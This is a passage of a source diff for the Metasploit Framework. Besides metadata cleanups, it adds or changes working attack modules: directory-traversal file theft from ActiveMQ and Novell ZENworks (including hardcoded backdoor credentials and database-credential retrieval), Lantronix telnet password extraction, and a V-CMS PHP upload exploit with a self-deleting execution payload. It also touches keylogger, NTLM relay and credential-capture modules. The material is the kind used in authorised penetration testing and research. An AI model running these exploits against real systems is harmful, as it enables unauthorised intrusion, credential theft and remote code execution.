successfully on ActiveMQ 5.3.1 and 5.3.2 over Windows 2003 SP2.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'AbdulAziz Hariri', # Vulnerability discovery
|
||||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '86401' ],
|
||||
[ 'URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=895' ],
|
||||
[ 'URL', 'https://issues.apache.org/jira/browse/amq-2788' ]
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8161),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', '/boot.ini']),
|
||||
OptInt.new('DEPTH', [false, 'Traversal depth if absolute is set to false', 4])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
# No point to continue if no filename is specified
|
||||
if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
|
||||
print_error("#{rhost}:#{rport} - Please supply FILEPATH")
|
||||
return
|
||||
end
|
||||
|
||||
travs = "/\\.." * (datastore['DEPTH'] || 1)
|
||||
travs << "/" unless datastore['FILEPATH'][0] == "\\" or datastore['FILEPATH'][0] == "/"
|
||||
travs << datastore['FILEPATH']
|
||||
|
||||
print_status("#{rhost}:#{rport} - Sending request...")
|
||||
res = send_request_cgi({
|
||||
'uri' => travs,
|
||||
'method' => 'GET',
|
||||
})
|
||||
|
||||
if res and res.code == 200
|
||||
contents = res.body
|
||||
fname = File.basename(datastore['FILEPATH'])
|
||||
path = store_loot(
|
||||
'apache.activemq',
|
||||
'application/octet-stream',
|
||||
ip,
|
||||
contents,
|
||||
fname
|
||||
)
|
||||
print_status("#{rhost}:#{rport} - File saved in: #{path}")
|
||||
else
|
||||
print_error("#{rhost}:#{rport} - Failed to retrieve file")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
|
@ -16,7 +16,7 @@ class Metasploit4 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'Atlassian Crowd XML Entity Expansion Remote File Access',
|
||||
'Version' => '$Revision: $',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module simply attempts to read a remote file from the server using a
|
||||
vulnerability in the way Atlassian Crowd handles XML files. The vulnerability
|
||||
|
|
|
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
},
|
||||
'References' =>
|
||||
[
|
||||
['EDB', 12721],
|
||||
['EDB', '12721'],
|
||||
['OSVDB', '59001'],
|
||||
],
|
||||
'Author' =>
|
||||
|
|
|
@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['OSVDB', '68301'],
|
||||
['URL', 'http://secunia.com/advisories/41609/'],
|
||||
['EDB', 15130]
|
||||
['EDB', '15130']
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
|
|
|
@ -1,112 +0,0 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'net/http'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Del.icio.us Domain Links (URLs) Enumerator',
|
||||
'Description' => %q{
|
||||
This module pulls and parses the URLs stored by Del.icio.us users for the
|
||||
purpose of replaying during a web assessment. Finding unlinked and old pages.
|
||||
},
|
||||
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('DOMAIN', [ true, "Domain to request URLS for"]),
|
||||
OptString.new('OUTFILE', [ false, "Where to output the list for use"])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
[
|
||||
OptString.new('PROXY', [ false, "Proxy server to route connection. <host>:<port>",nil]),
|
||||
OptString.new('PROXY_USER', [ false, "Proxy Server User",nil]),
|
||||
OptString.new('PROXY_PASS', [ false, "Proxy Server Password",nil])
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def pull_urls(targetdom)
|
||||
response = ""
|
||||
list = []
|
||||
lastpage = 0
|
||||
pagenum = 1
|
||||
while lastpage == 0
|
||||
print_status("Page number: " + pagenum.to_s)
|
||||
header = { 'User-Agent' => "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13"}
|
||||
clnt = Net::HTTP::Proxy(@proxysrv,@proxyport,@proxyuser,@proxypass).new("www.delicious.com")
|
||||
resp = clnt.get2("/search?p=site%3A"+targetdom+"&page="+pagenum.to_s,header)
|
||||
response << resp.body
|
||||
response.each_line do |line|
|
||||
list << line.gsub!(/(.+<a rel=\"nofollow)(.+=+\")(.+)(\".+)/, '\3')
|
||||
end
|
||||
if /pn\ next/.match(data)
|
||||
pagenum += 1
|
||||
else
|
||||
lastpage = 1
|
||||
end
|
||||
end
|
||||
|
||||
list.delete_if{|x| x==nil}
|
||||
list.uniq!
|
||||
list.sort!
|
||||
|
||||
return list
|
||||
end
|
||||
|
||||
def write_output(data)
|
||||
print_status("Writing URLs list to #{datastore['OUTFILE']}...")
|
||||
file_name = datastore['OUTFILE']
|
||||
if FileTest::exist?(file_name)
|
||||
print_status("OUTFILE already existed, appending..")
|
||||
else
|
||||
print_status("OUTFILE did not exist, creating..")
|
||||
end
|
||||
|
||||
File.open(file_name, 'ab') do |fd|
|
||||
fd.write(data)
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
if datastore['PROXY']
|
||||
@proxysrv,@proxyport = datastore['PROXY'].split(":")
|
||||
@proxyuser = datastore['PROXY_USER']
|
||||
@proxypass = datastore['PROXY_PASS']
|
||||
else
|
||||
@proxysrv,@proxyport = nil, nil
|
||||
end
|
||||
|
||||
target = datastore['DOMAIN']
|
||||
|
||||
urls = []
|
||||
print_status("Pulling urls from Delicious.com")
|
||||
urls = pull_urls(target)
|
||||
|
||||
print_status("Located #{urls.count} addresses for #{target}")
|
||||
|
||||
if datastore['OUTFILE']
|
||||
write_output(urls.join)
|
||||
else
|
||||
urls.each do |i|
|
||||
print_status(i)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
|
@ -22,7 +22,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
This module pulls and parses the URLs stored by Archive.org for the purpose of
|
||||
replaying during a web assessment. Finding unlinked and old pages.
|
||||
},
|
||||
'Author' => [ 'Rob Fuller <mubix [at] hak5.org>' ],
|
||||
'Author' => [ 'mubix' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$'
|
||||
))
|
||||
|
|
|
@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
This module can be used to enumerate information
|
||||
about an IP addresses from Project HoneyPot's HTTP Block List.
|
||||
},
|
||||
'Author' => [ 'Rob Fuller <mubix[at]rapid7.com>' ],
|
||||
'Author' => [ 'mubix' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
|
|
|
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2010-2333' ],
|
||||
[ 'OSVDB', '65476' ],
|
||||
[ 'BID', '40815' ],
|
||||
[ 'EDB', 13850 ]
|
||||
[ 'EDB', '13850' ]
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
|
|
|
@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
['CVE', '2011-0063'],
|
||||
['URL', 'https://sitewat.ch/en/Advisory/View/1'],
|
||||
['URL', 'http://sotiriu.de/adv/NSOADV-2011-003.txt'],
|
||||
['EDB', 16103]
|
||||
['EDB', '16103']
|
||||
],
|
||||
'DisclosureDate' => 'Mar 08 2011',
|
||||
'License' => MSF_LICENSE
|
||||
|
|
|
@ -31,8 +31,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[ 'CVE', '2010-2263' ],
|
||||
[ 'OSVDB', '65531' ],
|
||||
[ 'BID', '40760' ],
|
||||
[ 'EDB', 13818 ],
|
||||
[ 'EDB', 13822 ]
|
||||
[ 'EDB', '13818' ],
|
||||
[ 'EDB', '13822' ]
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
|
|
|
@ -0,0 +1,97 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Novell ZENworks Asset Management 7.5 Remote File Access',
|
||||
'Description' => %q{
|
||||
This module exploits a hardcoded user and password for the GetFile maintenance
|
||||
task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web
|
||||
Console and can be triggered by sending a specially crafted request to the rtrlet component,
|
||||
allowing a remote unauthenticated user to retrieve a maximum of 100_000_000 KB of
|
||||
remote files. This module has been successfully tested on Novell ZENworks Asset
|
||||
Management 7.5.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'juan vazquez' # Also the discoverer
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-4933' ],
|
||||
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks' ] ]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptBool.new('ABSOLUTE', [ true, 'Use an absolute file path or directory traversal relative to the tomcat home', true ]),
|
||||
OptString.new('FILEPATH', [true, 'The name of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts']),
|
||||
OptInt.new('DEPTH', [false, 'Traversal depth if absolute is set to false', 1])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
# No point to continue if no filename is specified
|
||||
if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
|
||||
print_error("Please supply the name of the file you want to download")
|
||||
return
|
||||
end
|
||||
|
||||
post_data = "kb=100000000&"
|
||||
if datastore['ABSOLUTE']
|
||||
post_data << "file=#{datastore['FILEPATH']}&"
|
||||
post_data << "absolute=yes&"
|
||||
else
|
||||
travs = "../" * (datastore['DEPTH'] || 1)
|
||||
travs << "/" unless datastore['FILEPATH'][0] == "\\" or datastore['FILEPATH'][0] == "/"
|
||||
travs << datastore['FILEPATH']
|
||||
post_data << "file=#{travs}&"
|
||||
post_data << "absolute=no&"
|
||||
end
|
||||
post_data << "maintenance=GetFile_password&username=Ivanhoe&password=Scott&send=Submit"
|
||||
|
||||
print_status("#{rhost}:#{rport} - Sending request...")
|
||||
res = send_request_cgi({
|
||||
'uri' => '/rtrlet/rtr',
|
||||
'method' => 'POST',
|
||||
'data' => post_data,
|
||||
}, 5)
|
||||
|
||||
if res and res.code == 200 and res.body =~ /Last 100000000 kilobytes of/ and res.body =~ /File name/ and not res.body =~ /<br\/>File not found.<br\/>/
|
||||
print_good("#{rhost}:#{rport} - File retrieved successfully!")
|
||||
start_contents = res.body.index("<pre>") + 7
|
||||
end_contents = res.body.rindex("</pre>") - 1
|
||||
if start_contents.nil? or end_contents.nil?
|
||||
print_error("#{rhost}:#{rport} - Error reading file contents")
|
||||
return
|
||||
end
|
||||
contents = res.body[start_contents..end_contents]
|
||||
fname = File.basename(datastore['FILEPATH'])
|
||||
path = store_loot(
|
||||
'novell.zenworks_asset_management',
|
||||
'application/octet-stream',
|
||||
ip,
|
||||
contents,
|
||||
fname
|
||||
)
|
||||
print_status("#{rhost}:#{rport} - File saved in: #{path}")
|
||||
else
|
||||
print_error("#{rhost}:#{rport} - Failed to retrieve file")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
|
@ -0,0 +1,74 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Novell ZENworks Asset Management 7.5 Configuration Access',
|
||||
'Description' => %q{
|
||||
This module exploits a hardcoded user and password for the GetConfig maintenance
|
||||
task in Novell ZENworks Asset Management 7.5. The vulnerability exists in the Web
|
||||
Console and can be triggered by sending a specially crafted request to the rtrlet component,
|
||||
allowing a remote unauthenticated user to retrieve the configuration parameters of
|
||||
Nozvell Zenworks Asset Managmment, including the database credentials in clear text.
|
||||
This module has been successfully tested on Novell ZENworks Asset Management 7.5.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'juan vazquez' # Also the discoverer
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2012-4933' ],
|
||||
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2012/10/11/cve-2012-4933-novell-zenworks' ]
|
||||
]
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
||||
post_data = "kb=&file=&absolute=&maintenance=GetConfigInfo_password&username=Ivanhoe&password=Scott&send=Submit"
|
||||
|
||||
print_status("#{rhost}:#{rport} - Sending request...")
|
||||
res = send_request_cgi({
|
||||
'uri' => '/rtrlet/rtr',
|
||||
'method' => 'POST',
|
||||
'data' => post_data,
|
||||
}, 5)
|
||||
|
||||
if res and res.code == 200 and res.body =~ /<b>Rtrlet Servlet Configuration Parameters \(live\)<\/b><br\/>/
|
||||
print_good("#{rhost}:#{rport} - File retrieved successfully!")
|
||||
path = store_loot(
|
||||
'novell.zenworks_asset_management.config',
|
||||
'text/html',
|
||||
ip,
|
||||
res.body,
|
||||
nil,
|
||||
"Novell ZENworks Asset Management Configuration"
|
||||
)
|
||||
print_status("#{rhost}:#{rport} - File saved in: #{path}")
|
||||
else
|
||||
print_error("#{rhost}:#{rport} - Failed to retrieve configuration")
|
||||
return
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
end
|
|
@ -101,7 +101,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
begin
|
||||
smb_login()
|
||||
rescue ::Rex::Proto::SMB::Exceptions::LoginError => e
|
||||
rescue ::Rex::Proto::SMB::Exceptions::LoginError
|
||||
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
|
||||
end
|
||||
|
||||
begin
|
||||
|
@ -135,7 +136,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
begin
|
||||
smb_login()
|
||||
rescue ::Rex::Proto::SMB::Exceptions::LoginError => e
|
||||
rescue ::Rex::Proto::SMB::Exceptions::LoginError
|
||||
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
|
||||
end
|
||||
|
||||
disconnect()
|
||||
|
@ -154,7 +156,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
connect()
|
||||
begin
|
||||
smb_login()
|
||||
rescue ::Rex::Proto::SMB::Exceptions::LoginError => e
|
||||
rescue ::Rex::Proto::SMB::Exceptions::LoginError
|
||||
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode
|
||||
end
|
||||
disconnect()
|
||||
datastore['SMBDomain'] = orig_domain
|
||||
|
|
|
@ -0,0 +1,94 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Auxiliary
|
||||
include Msf::Exploit::Remote::Udp
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Lantronix Telnet Password Recovery',
|
||||
'Description' => %q{
|
||||
This module retrieves the setup record from Lantronix serial-to-ethernet
|
||||
devices via the config port (30718/udp, enabled by default) and extracts the
|
||||
telnet password. It has been tested successfully on a Lantronix Device Server
|
||||
with software version V5.8.0.1.
|
||||
},
|
||||
'Author' => 'jgor',
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::CHOST,
|
||||
Opt::RPORT(30718)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
setup_probe = "\x00\x00\x00\xF8"
|
||||
password = nil
|
||||
|
||||
begin
|
||||
# Create an unbound UDP socket if no CHOST is specified, otherwise
|
||||
# create a UDP socket bound to CHOST (in order to avail of pivoting)
|
||||
udp_sock = Rex::Socket::Udp.create( {
|
||||
'LocalHost' => datastore['CHOST'] || nil,
|
||||
'PeerHost' => ip,
|
||||
'PeerPort' => datastore['RPORT'],
|
||||
'Context' =>
|
||||
{
|
||||
'Msf' => framework,
|
||||
'MsfExploit' => self
|
||||
}
|
||||
})
|
||||
|
||||
udp_sock.put(setup_probe)
|
||||
|
||||
res = udp_sock.recvfrom(65535, 0.5) and res[1]
|
||||
|
||||
if res
|
||||
password = parse_reply(res)
|
||||
end
|
||||
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused, ::IOError
|
||||
print_error("Connection error")
|
||||
rescue ::Interrupt
|
||||
raise $!
|
||||
rescue ::Exception => e
|
||||
print_error("Unknown error: #{e.class} #{e}")
|
||||
ensure
|
||||
udp_sock.close if udp_sock
|
||||
end
|
||||
|
||||
if password
|
||||
print_good("#{rhost} - Telnet password found: #{password.to_s}")
|
||||
report_auth_info({
|
||||
:host => rhost,
|
||||
:port => 9999,
|
||||
:sname => 'telnet',
|
||||
:duplicate_ok => false,
|
||||
:pass => password,
|
||||
})
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def parse_reply(pkt)
|
||||
setup_record = pkt[0]
|
||||
|
||||
# If response is a setup record, extract password bytes 13-16
|
||||
if setup_record[3].ord == 0xF9
|
||||
return setup_record[12,4]
|
||||
else
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
end
|
|
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['BID', '51182'],
|
||||
['CVE', '2011-4862'],
|
||||
['EDB', 18280],
|
||||
['EDB', '18280'],
|
||||
['URL', 'https://community.rapid7.com/community/metasploit/blog/2011/12/28/more-fun-with-bsd-derived-telnet-daemons']
|
||||
]
|
||||
)
|
||||
|
|
|
@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
['OSVDB', '77455'],
|
||||
['BID', '50890'],
|
||||
['EDB', 18189],
|
||||
['EDB', '18189'],
|
||||
['URL', 'http://secpod.org/advisories/SecPod_Ipswitch_TFTP_Server_Dir_Trav.txt']
|
||||
],
|
||||
'DisclosureDate' => "Dec 12 2011"
|
||||
|
|
|
@ -0,0 +1,64 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'rex/proto/ntlm/message'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::WinRM
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'WinRM Authentication Method Detection',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module sends a request to an HTTP/HTTPS service to see if it is a WinRM service.
|
||||
If it is a WinRM service, it also gathers the Authentication Methods supported.
|
||||
},
|
||||
'Author' => [ 'thelightcosine' ],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
deregister_options('USERNAME', 'PASSWORD')
|
||||
|
||||
end
|
||||
|
||||
|
||||
def run_host(ip)
|
||||
resp = winrm_poke
|
||||
return nil if resp.nil?
|
||||
if resp.code == 401 and resp.headers['Server'].include? "Microsoft-HTTPAPI"
|
||||
methods = parse_auth_methods(resp)
|
||||
desc = resp.headers['Server'] + " Authentication Methods: " + methods.to_s
|
||||
report_service(
|
||||
:host => ip,
|
||||
:port => rport,
|
||||
:proto => 'tcp',
|
||||
:name => 'winrm',
|
||||
:info => desc
|
||||
)
|
||||
print_good "Negotiate protocol supported" if methods.include? "Negotiate"
|
||||
print_good "Kerberos protocol supported" if methods.include? "Kerberos"
|
||||
print_good "Basic protocol supported" if methods.include? "Basic"
|
||||
else
|
||||
print_error "#{ip}:#{rport} Does not appear to be a WinRM server"
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
end
|
|
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'Authentication Capture: DRDA (DB2, Informix, Derby)',
|
||||
'Version' => '$Revision: 14774 $',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module provides a fake DRDA (DB2, Informix, Derby) server
|
||||
that is designed to capture authentication credentials.
|
||||
|
|
|
@ -182,8 +182,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_good("[#{cid}] Logging raw keystrokes to: #{@client_cache[cid][:path_raw]}")
|
||||
end
|
||||
|
||||
::File.open( @client_cache[cid][:path_clean], "a") { |fd| fd.puts nice }
|
||||
::File.open( @client_cache[cid][:path_raw], "a") { |fd| fd.write(real) }
|
||||
::File.open( @client_cache[cid][:path_clean], "ab") { |fd| fd.puts nice }
|
||||
::File.open( @client_cache[cid][:path_raw], "ab") { |fd| fd.write(real) }
|
||||
|
||||
if nice.length > 0
|
||||
print_good("[#{cid}] Keys: #{nice}")
|
||||
|
|
|
@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def on_request_uri(cli, request)
|
||||
print_status("Request '#{request.uri}'...")
|
||||
|
||||
|
||||
case request.method
|
||||
when 'OPTIONS'
|
||||
process_options(cli, request)
|
||||
|
@ -101,7 +101,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
exploit()
|
||||
end
|
||||
|
||||
|
||||
def process_options(cli, request)
|
||||
print_status("OPTIONS #{request.uri}")
|
||||
headers = {
|
||||
|
|
|
@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'HTTP Client MS Credential Relayer',
|
||||
'Version' => '$Revision:$',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module relays negotiated NTLM Credentials from an HTTP server to multiple
|
||||
protocols. Currently, this module supports relaying to SMB and HTTP.
|
||||
|
@ -52,7 +52,6 @@ class Metasploit3 < Msf::Auxiliary
|
|||
[
|
||||
'Rich Lundeen <richard.lundeen[at]gmail.com>',
|
||||
],
|
||||
'Version' => '$Revision:$',
|
||||
'License' => MSF_LICENSE,
|
||||
'Actions' =>
|
||||
[
|
||||
|
@ -93,7 +92,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
# Handles the initial requests waiting for the browser to try NTLM auth
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
|
||||
case request.method
|
||||
when 'OPTIONS'
|
||||
process_options(cli, request)
|
||||
|
@ -136,7 +135,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
parse_args()
|
||||
exploit()
|
||||
end
|
||||
|
||||
|
||||
def process_options(cli, request)
|
||||
print_status("OPTIONS #{request.uri}")
|
||||
headers = {
|
||||
|
|
|
@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Description' => 'This module emulates a webserver leaking PII data',
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => 'MJC',
|
||||
'Version' => '$Revision: $',
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'http://www.metasploit.com'],
|
||||
|
|
|
@ -22,7 +22,7 @@ class Metasploit3 < Msf::Encoder::XorAdditiveFeedback
|
|||
def initialize
|
||||
super(
|
||||
'Name' => 'CPUID-based Context Keyed Payload Encoder',
|
||||
'Version' => '$Revision: 1$',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai.
|
||||
},
|
||||
|
|
|
@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
|
||||
['OSVDB', '61284']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
|
@ -48,6 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['Apple iOS', { 'accounts' => [ [ 'root', 'alpine' ], [ 'mobile', 'dottie' ]] } ],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => "Jul 2 2007",
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
|
|
|
@ -41,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'PrependEncoder' => "\x83\xec\x7f",
|
||||
'DisableNops' => 'True',
|
||||
},
|
||||
'Platform' => 'BSD',
|
||||
'Platform' => 'bsd',
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
|
|
|
@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['CVE', '2011-4862'],
|
||||
['OSVDB', '78020'],
|
||||
['BID', '51182'],
|
||||
['EDB', 18280]
|
||||
['EDB', '18280']
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Platform' => 'bsd',
|
||||
|
|
|
@ -6,11 +6,13 @@
|
|||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/exploit/php_exe'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::PhpEXE
|
||||
|
||||
def initialize(info={})
|
||||
super(update_info(info,
|
||||
|
@ -28,8 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'AutoSec Tools', #Initial discovery
|
||||
'sinn3r' #Metasploit
|
||||
'AutoSec Tools', # Initial discovery
|
||||
'sinn3r' # Metasploit
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
|
@ -42,15 +44,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
{
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => "none"
|
||||
},
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' =>
|
||||
[
|
||||
['V-CMS 1.0', {}],
|
||||
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
|
||||
[ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => "Nov 27 2011", #When the ticket was created
|
||||
|
@ -75,15 +74,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
|
||||
def on_new_session(client)
|
||||
if client.type == "meterpreter"
|
||||
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
|
||||
client.fs.file.rm(@payload_name)
|
||||
else
|
||||
client.shell_command_token("rm #{@payload_name}")
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
|
@ -91,18 +81,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
base << '/' if base[-1,1] != '/'
|
||||
|
||||
@payload_name = "#{rand_text_alpha(5)}.php"
|
||||
p = %Q|<?php
|
||||
#{payload.encoded}
|
||||
?>
|
||||
|
|
||||
|
||||
p = p.gsub(/^\t\t/, '')
|
||||
p = get_write_exec_payload(:unlink_self=>true)
|
||||
|
||||
post_data = "------x\r\n"
|
||||
post_data << "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"\r\n"
|
||||
post_data << "Content-Type: image/gif\r\n"
|
||||
post_data << "\r\n"
|
||||
post_data << p
|
||||
post_data << p + "\r\n"
|
||||
post_data << "------x--\r\n"
|
||||
|
||||
print_status("#{peer} Uploading payload: #{@payload_name}")
|
||||
|
@ -133,4 +118,4 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
handler
|
||||
end
|
||||
end
|
||||
end
